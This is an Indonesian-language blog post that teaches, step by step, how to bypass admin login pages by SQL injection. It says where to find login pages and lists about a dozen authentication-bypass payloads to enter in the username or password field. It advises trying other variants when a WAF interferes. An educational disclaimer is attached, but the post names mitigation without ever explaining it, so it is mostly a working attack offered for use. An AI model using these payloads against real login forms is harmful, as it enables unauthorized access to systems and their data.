RSEC-SQL: Mengenal SQLI Bypass Admin Login

 Yups hello....

Post ini melanjutkan pembahasan tentang SQLI di post sebelumnya, tetapi ini menggunakan cara yg sederhana, cepat, dan simple, sehingga semua pun bisa mempraktekannya. Langsung saja bahas langkah langkah nya ya biar ga banyak menghabiskan waktu.




Step by Step Bypass Admin (SQL Injection)


SQL Injection (SQLi) adalah salah satu teknik serangan yang digunakan untuk mengeksploitasi kerentanan dalam sistem autentikasi berbasis database. Salah satu metode yang sering digunakan adalah Bypass Admin, di mana penyerang dapat mengakses dashboard admin tanpa mengetahui kredensial yang sah.

Artikel ini bertujuan untuk memberikan pemahaman tentang bagaimana teknik ini bekerja serta pentingnya mitigasi terhadap serangan ini.

 Disclaimer:

Semua informasi yang diberikan hanya untuk tujuan edukasi dan pengujian keamanan secara legal. Mengakses sistem tanpa izin adalah tindakan ilegal dan dapat dikenakan sanksi hukum. Jika Anda menemukan kerentanan di suatu website, segera laporkan kepada pihak yang berwenang. Dan berikut step nya:

1. Menemukan Halaman Login
Langkah pertama adalah mencari halaman login yang berpotensi rentan terhadap SQL Injection. Halaman ini biasanya memiliki URL seperti berikut:

https://target.com/admin  
https://target.com/login  
https://target.com/dashboard

Jika halaman login ditemukan, langkah berikutnya adalah mencoba melakukan eksploitasi.

2. Menggunakan Payload SQL Injection
Di kolom username atau password, masukkan salah satu payload berikut untuk menguji apakah sistem rentan terhadap serangan:

'="or'  
' or ''-'  
' or '' '' or ''&'  
' or ''^'  
' or ''*'  
' or 1=1 limit 1 -- -+  
or true--  
')) or (('x'))=(('x  
") or ("x")=("x  
or 1=1#  
admin' or '1'='1

Jika sistem tidak memiliki validasi input yang baik, server akan mengeksekusi perintah SQL ini dan memberikan akses tanpa perlu kredensial yang valid.

3. Mengonfirmasi Keberhasilan atau Kegagalan
Jika Berhasil: Kalian bisa masuk ke dashboard admin tanpa autentikasi yang sah. Segera laporkan kepada pemilik situs atau tim keamanan terkait agar mereka bisa memperbaikinya.

Jika Gagal: Coba variasi payload lain atau periksa apakah sistem memiliki proteksi seperti WAF (Web Application Firewall) atau validasi input yang lebih ketat.

Untuk lebih jelas bisa lihat di:

Kesimpulan

SQL Injection masih menjadi ancaman serius bagi keamanan web. Oleh karena itu, penting bagi pengembang dan pemilik website untuk memahami cara kerja serangan ini dan menerapkan langkah-langkah mitigasi yang tepat.

Jika ada pertanyaan atau hal yang anda ingin ketahui anda bisa menghubungi saya di Telegram.

Sekian dan terima kasih...




0 Comments